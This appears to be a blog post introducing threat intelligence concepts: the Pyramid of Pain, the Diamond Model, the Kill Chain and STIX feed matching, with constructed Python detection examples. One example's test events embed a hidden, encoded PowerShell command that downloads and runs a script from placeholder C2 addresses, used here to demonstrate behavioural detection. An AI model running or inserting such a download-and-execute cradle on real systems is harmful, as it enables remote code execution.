To understand the security of a company you need to know a great deal about it. In this post I'll briefly explain what Threat Intelligence is, why it is essential, and what the main types are.
What Is Threat Intelligence?
There is plenty of material on "threat intelligence" a Google search away. In short, it is knowledge about the threats that have targeted, are targeting, or will target an organization, and it is used to prepare for, detect, and stop the cyber threats that go after the organization's valuable assets.
What does that mean in practice? Imagine a burglar working through every house in a neighbourhood. Two days later one of them is broken into. Does he work alone or with accomplices? Is he picking specific people? Is he after something in particular? How does he get in? These are the questions we ask in the security field, and Threat Intelligence helps us answer them: it tells us how an attacker operates so that we can keep them out of our house.
In practical terms, threat intelligence can be a large database of Indicators of Compromise (IoCs) that links each indicator, and the TTPs (tactics, techniques, and procedures) behind it, to a specific attack or attacker. We will come back to this later in the article.
How Important Is It?
Back to the burglar and the house. We would want to know whether he is dangerous, whether he works alone, how he picks his targets, and which tools he uses. The more we know, the better we can set up defenses to protect the house, deter him, and spot anything that makes the house vulnerable. We could, for example, hire a security guard so the house is never left unattended for long, or install cameras and alarms to watch the outside.
For computer systems, the most dangerous case is the zero-day exploit: an attack on a vulnerability for which no fix exists yet. Threat intelligence helps us stay one step ahead of it.
It takes time for a zero-day exploit to become known, be patched, and be added to intelligence databases and antivirus (AV) signatures. During this Window of Vulnerability (see Figure #1) the SOC team and the threat analysts must work hard to learn the tools, methods, and vulnerabilities in use, and to write automation that monitors for that behaviour, so that exploitation can be detected and blocked while no fix exists. That is why this work matters so much.
Pyramid of Pain (for the Attacker)
The Pyramid of Pain, introduced by David Bianco in 2013, is described as "A model for the effective use of Cyber Threat Intelligence in threat detection operations, with a focus on increasing the adversaries' cost of operations" (SANS).
For example, when we build a "background" on a piece of malware or on Trudy (the attacker), we might look at the hosts or IP addresses they use, or compute hash values for the malware. But all of this is volatile information that the attacker can change very quickly: a rebuild gives a new hash, and a new server gives a new IP.
The pyramid ranks indicators by how much it hurts the attacker when we deny them (the labels on its right): hash values are trivial to change, IP addresses easy, domain names simple, network and host artifacts annoying, tools challenging, and TTPs tough. Changing tools or adopting a genuinely different TTP is hard for them. That is why threat intelligence aims at the upper levels: understanding how Trudy behaves, so that we can improve our IDS, IPS, and other tools around that behaviour rather than around indicators that expire within a day.
Getting to the top of the pyramid is not obvious, but there are several ways to collect that kind of information:
- Set up honeypot networks to learn about the techniques in use.
- Reverse engineer malware to understand the system artifacts it leaves.
- Use a dark web monitoring service.
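The pyramid's point is easiest to see as detection logic. The example below is added here and is not code from the original post: it observes the same intrusion twice, where the attacker rebuilds the dropper (new hash) and moves the C2 to a new server (new IP) between runs but keeps the TTP, an Office application spawning PowerShell with an encoded command. Every indicator, event and hash is constructed, the IP addresses are from the TEST-NET ranges, and the ATT&CK technique numbers in the comments are for orientation only.

```python
"""Pyramid of Pain, as detection logic (constructed example).

Bottom of the pyramid: the hash and C2 IP extracted from run 1.
Top of the pyramid: a behavioural rule for the TTP itself.
Only the behavioural rule survives the attacker's changes in run 2.
"""
import base64
import hashlib
import re
from dataclasses import dataclass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Atomic indicators from run 1 (constructed; "dropper build 1" stands in
# for the real document bytes).
KNOWN_HASHES = {sha256_hex(b"dropper build 1"): "invoice.docm, run 1"}
KNOWN_IPS = {"203.0.113.10": "C2 server, run 1"}

# Behavioural rule: Office app -> powershell.exe with -EncodedCommand
# (ATT&CK T1059.001, typically delivered via T1566.001).  PowerShell
# accepts any unambiguous prefix of the flag, so -e / -enc also count.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # child command line
    sha256: str    # hash of the document that started the chain
    dest_ip: str   # first outbound connection made by the child


def match_hash(ev: ProcessEvent) -> bool:
    return ev.sha256 in KNOWN_HASHES


def match_ip(ev: ProcessEvent) -> bool:
    return ev.dest_ip in KNOWN_IPS


def match_ttp(ev: ProcessEvent) -> bool:
    return (ev.parent.lower() in OFFICE_APPS
            and ev.image.lower() == "powershell.exe"
            and ENCODED_FLAG.search(ev.cmdline) is not None)


def evaluate(ev: ProcessEvent) -> dict:
    """Which pyramid levels fire for one event."""
    return {"hash": match_hash(ev), "ip": match_ip(ev), "ttp": match_ttp(ev)}


def encoded(ps: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Run 1: everything matches the intel we already have.
RUN1 = ProcessEvent(
    parent="WINWORD.EXE", image="powershell.exe",
    cmdline="powershell.exe -nop -w hidden -enc " + encoded(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"),
    sha256=sha256_hex(b"dropper build 1"), dest_ip="203.0.113.10")

# Run 2: rebuilt document, new server, same behaviour.
RUN2 = ProcessEvent(
    parent="WINWORD.EXE", image="powershell.exe",
    cmdline="powershell.exe -nop -w hidden -enc " + encoded(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b')"),
    sha256=sha256_hex(b"dropper build 2"), dest_ip="198.51.100.7")


if __name__ == "__main__":
    for name, ev in (("run 1", RUN1), ("run 2", RUN2)):
        print(name, evaluate(ev))
```

Run 1 fires all three levels; run 2 fires only the TTP rule. That is the argument of the pyramid in one line of output: the hash and IP feed would have missed the second intrusion entirely.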
Threat Intelligence Types
There are four types of threat intelligence. Each covers a different part of the process, from the strategic level down to the technical, and they complement each other. Let's look at them in more detail:
- Technical – Individual IP addresses, URLs, and file hashes. These come from threat feeds, honeypot attacks, and malware analysis. In a nutshell, it describes the attacker's resources used in the attack. Threat hunting in your SOC can search for these directly.
- Tactical – TTPs, toolkits, exploits, and frameworks. Security professionals use this to learn the attackers' technical capabilities, goals, and attack vectors. Correlation and detection rules in your SOC build on this type.
- Operational – Details of specific threats against the company: who is behind a campaign, their intent and timing, and the malware campaigns in progress. It gives more context than a bare indicator and helps you predict what comes next.
- Strategic – High-level information about the security posture, the threat landscape, and the cost of cyber activity. It is mostly delivered as a report written for the business. This is where you plan your defense.
Intrusion Analysis Models & Attack Frameworks
There are several models, such as MITRE ATT&CK, the Cyber Kill Chain, and the Diamond Model, that help you understand TTPs and do intrusion analysis. The good news is that you don't have to choose one of them: they work well together.
Diamond Model: This is an intrusion analysis model that helps you understand the intrusions in your environment by applying scientific principles to intrusion analysis: measurement, testability, and repeatability. It looks simple, but using it well is not effortless.
The Diamond looks like Figure #4 below. The Adversary is the attacker. The Capability is what the attacker uses: exploits, malware, or anything else that can hurt your system. The Infrastructure is an IP address, domain name, email address, and so on. The Victim is the asset or person on the receiving end, for example the person who gets scammed.
The adversary develops the capability and uses the infrastructure; the victim is exploited by the capability and is connected to the infrastructure.
It is useful because it helps us pin down who the attacker was, who the victim was, which infrastructure they used, and how they did it.
MITRE ATT&CK: A framework that identifies points of intrusion and helps us understand the methods attackers use to move around, which makes it ideal for identifying the techniques a defense needs to cover to prevent future attacks. It is available at https://attack.mitre.org/.
Cyber Kill Chain
It is a model for detecting and preventing cyber intrusion activity. It identifies the tasks an adversary must complete to achieve their goals, from reconnaissance through delivery and exploitation to actions on objectives. Here's an excellent image from the Cybots website that summarizes the seven steps, which in Lockheed Martin's original are:
- Reconnaissance
- Weaponization
- Delivery
- Exploitation
- Installation
- Command and Control
- Actions on Objectives
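The Diamond Model and the Cyber Kill Chain are most useful together: each event is a diamond (adversary, capability, infrastructure, victim) tagged with the kill-chain phase it belongs to, and the analyst pivots between diamonds that share a vertex. The example below is added here and is not code from the original post or from either model's authors. It shows the three pivots analysts make most: from one infrastructure node to everything that touched it, propagating a known adversary label across shared nodes, and laying events out as a kill-chain-ordered activity thread. All events, names and addresses are constructed; "Group-A" is a hypothetical actor name.

```python
"""Diamond Model events with a Cyber Kill Chain phase (constructed example)."""
from dataclasses import dataclass, replace

# Lockheed Martin's seven phases, in order.
PHASES = ["reconnaissance", "weaponization", "delivery", "exploitation",
          "installation", "command_and_control", "actions_on_objectives"]


@dataclass(frozen=True)
class DiamondEvent:
    adversary: str        # who; "unknown" until attributed
    capability: str       # malware, exploit or tool used
    infrastructure: str   # IP, domain or mailbox the adversary used
    victim: str           # asset or person on the receiving end
    phase: str            # Cyber Kill Chain phase of this event
    timestamp: str        # ISO 8601, so it sorts as text

    def __post_init__(self):
        if self.phase not in PHASES:
            raise ValueError(f"unknown kill-chain phase: {self.phase}")


EVENTS = [
    # An older incident that a vendor report attributed to "Group-A".
    DiamondEvent("Group-A", "rat beacon", "203.0.113.5", "host-b",
                 "command_and_control", "2023-03-14T22:05"),
    # A new, unattributed intrusion on host-a, in the order it was found.
    DiamondEvent("unknown", "rat beacon", "203.0.113.5", "host-a",
                 "command_and_control", "2023-05-01T09:40"),
    DiamondEvent("unknown", "rat-loader.exe", "cdn-files.example", "host-a",
                 "installation", "2023-05-01T09:31"),
    DiamondEvent("unknown", "macro dropper", "cdn-files.example", "host-a",
                 "exploitation", "2023-05-01T09:30"),
    DiamondEvent("unknown", "invoice.docm", "mail.invoice-portal.example",
                 "host-a", "delivery", "2023-05-01T09:12"),
]


def pivot_infrastructure(events, infrastructure):
    """Everything connected to one infrastructure node."""
    hits = [e for e in events if e.infrastructure == infrastructure]
    return {"victims": sorted({e.victim for e in hits}),
            "capabilities": sorted({e.capability for e in hits}),
            "adversaries": sorted({e.adversary for e in hits})}


def attribute_by_shared_nodes(events):
    """Propagate an adversary label to unknown events that share the
    same infrastructure or capability, repeating until nothing changes.
    Caveat: a shared node is only evidence if it is adversary-specific;
    a public CDN or mail provider would over-attribute here."""
    events = list(events)
    changed = True
    while changed:
        changed = False
        known = {}
        for e in events:
            if e.adversary != "unknown":
                known[("infra", e.infrastructure)] = e.adversary
                known[("cap", e.capability)] = e.adversary
        for i, e in enumerate(events):
            if e.adversary != "unknown":
                continue
            label = (known.get(("infra", e.infrastructure))
                     or known.get(("cap", e.capability)))
            if label:
                events[i] = replace(e, adversary=label)
                changed = True
    return events


def activity_thread(events, *, victim=None, adversary=None):
    """Events for one victim or adversary, ordered by kill-chain phase
    and then by time: the path the attacker actually walked."""
    sel = [e for e in events
           if (victim is None or e.victim == victim)
           and (adversary is None or e.adversary == adversary)]
    return sorted(sel, key=lambda e: (PHASES.index(e.phase), e.timestamp))


if __name__ == "__main__":
    print(pivot_infrastructure(EVENTS, "203.0.113.5"))
    for e in activity_thread(attribute_by_shared_nodes(EVENTS), victim="host-a"):
        print(e.phase, e.adversary, e.capability, e.infrastructure)
```

Pivoting on the C2 address ties host-a's beacon to the older Group-A incident, the propagation step then labels it, and the thread for host-a comes out in kill-chain order (delivery, exploitation, installation, command and control) even though the events were logged in a different order. The delivery and payload-hosting nodes stay unattributed because nothing known shares them, which is the right outcome until more evidence arrives.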
The Consumption and Sharing of Threat Intelligence
Threat intelligence is largely exchanged as Indicators of Compromise (IoCs). These can be public (open source) or sold by vendors through a subscription feed.
Some open-source places to get threat information from:
- OSINT Framework
Here are a few examples of commercial ones:
- Palo Alto Networks AutoFocus
- IBM X-Force Exchange
- Anomali ThreatStream
To speed up monitoring, these feeds can be configured to alert on specific IPs or domains. A SIEM such as ArcSight ESM, Splunk, or QRadar is usually used to correlate all the events with the IoCs. If something looks suspicious, the threat analyst has to investigate and decide whether it is a true positive or not.
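What the SIEM does with a feed is simple to show end to end. The example below is added here and is not code from the original post or from any of the vendors named above: it loads a STIX 2.1 indicator bundle (constructed for this example; a real feed delivers the same JSON, usually over TAXII) and matches it against normalised SIEM events, dropping indicators whose valid_until has passed so that stale IoCs do not generate noise. The pattern parser handles only the subset most feeds ship, single comparisons joined by OR, and the mapping from STIX object paths to event field names is an assumption about the event schema.

```python
"""Consume a STIX 2.1 indicator feed and match SIEM events (constructed example)."""
import hashlib
import json
import re
from datetime import datetime, timezone

# Stand-in for a real sample's hash; the bytes are made up.
SAMPLE_SHA256 = hashlib.sha256(b"constructed dropper sample").hexdigest()

# Constructed bundle; UUIDs are placeholders, not real feed identifiers.
FEED_JSON = json.dumps({
    "type": "bundle",
    "id": "bundle--0f3a5d2e-7c1b-4e6a-9d8f-000000000000",
    "objects": [
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0f3a5d2e-7c1b-4e6a-9d8f-000000000001",
         "created": "2024-01-10T00:00:00.000Z", "modified": "2024-01-10T00:00:00.000Z",
         "name": "C2 servers", "indicator_types": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '203.0.113.10' OR ipv4-addr:value = '203.0.113.11']",
         "valid_from": "2024-01-10T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0f3a5d2e-7c1b-4e6a-9d8f-000000000002",
         "created": "2023-11-01T00:00:00.000Z", "modified": "2024-02-01T00:00:00.000Z",
         "name": "Old payload host", "indicator_types": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": "[domain-name:value = 'update-check.example']",
         "valid_from": "2023-11-01T00:00:00Z",
         "valid_until": "2024-03-01T00:00:00Z"},   # expired: domain was sinkholed
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0f3a5d2e-7c1b-4e6a-9d8f-000000000003",
         "created": "2024-04-02T00:00:00.000Z", "modified": "2024-04-02T00:00:00.000Z",
         "name": "Dropper", "indicator_types": ["malicious-activity"],
         "pattern_type": "stix",
         "pattern": f"[file:hashes.'SHA-256' = '{SAMPLE_SHA256}']",
         "valid_from": "2024-04-02T00:00:00Z"},
    ],
})

# STIX object path -> field name in our (assumed) normalised events.
FIELD_MAP = {
    ("ipv4-addr", "value"): "dest_ip",
    ("domain-name", "value"): "domain",
    ("file", "hashes.'SHA-256'"): "sha256",
}
COMPARISON = re.compile(r"([a-z0-9-]+):([A-Za-z0-9_.'-]+)\s*=\s*'([^']*)'")


def parse_pattern(pattern: str):
    """Return [(event_field, value), ...]; any one term matching is a hit."""
    if " AND " in pattern or "FOLLOWEDBY" in pattern or "[" not in pattern:
        raise ValueError(f"unsupported pattern: {pattern}")
    terms = []
    for obj, path, value in COMPARISON.findall(pattern):
        field = FIELD_MAP.get((obj, path))
        if field is None:
            raise ValueError(f"unsupported object path {obj}:{path}")
        terms.append((field, value.lower()))
    if not terms:
        raise ValueError(f"no comparison found in: {pattern}")
    return terms


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def load_indicators(bundle_json: str, now: datetime):
    """Indicators from the bundle that are current at `now`."""
    out = []
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("revoked"):
            continue
        if _ts(obj["valid_from"]) > now:
            continue
        if "valid_until" in obj and _ts(obj["valid_until"]) <= now:
            continue   # stale indicator: alerting on it only creates noise
        out.append({"id": obj["id"], "name": obj.get("name", ""),
                    "terms": parse_pattern(obj["pattern"])})
    return out


def match_events(indicators, events):
    """(event index, indicator id, field, value) per hit, one per pair."""
    hits = []
    for i, ev in enumerate(events):
        for ind in indicators:
            for field, value in ind["terms"]:
                if str(ev.get(field, "")).lower() == value:
                    hits.append((i, ind["id"], field, value))
                    break
    return hits


# Constructed SIEM events (proxy, DNS and EDR records after normalisation).
EVENTS = [
    {"host": "ws-01", "dest_ip": "203.0.113.11", "domain": "", "sha256": ""},
    {"host": "ws-02", "dest_ip": "198.51.100.20", "domain": "update-check.example", "sha256": ""},
    {"host": "ws-03", "dest_ip": "", "domain": "", "sha256": SAMPLE_SHA256.upper()},
    {"host": "ws-04", "dest_ip": "192.0.2.9", "domain": "intranet.corp.example", "sha256": ""},
]
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)

if __name__ == "__main__":
    for hit in match_events(load_indicators(FEED_JSON, NOW), EVENTS):
        print(hit)
```

Two hits come out: ws-01 talking to the second C2 address and ws-03 with the dropper hash (matched case-insensitively, since EDR products differ in hex case). ws-02 resolving the old payload host produces nothing because that indicator expired, which is exactly the triage decision the analyst would otherwise have to make by hand.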
The next post will be up soon.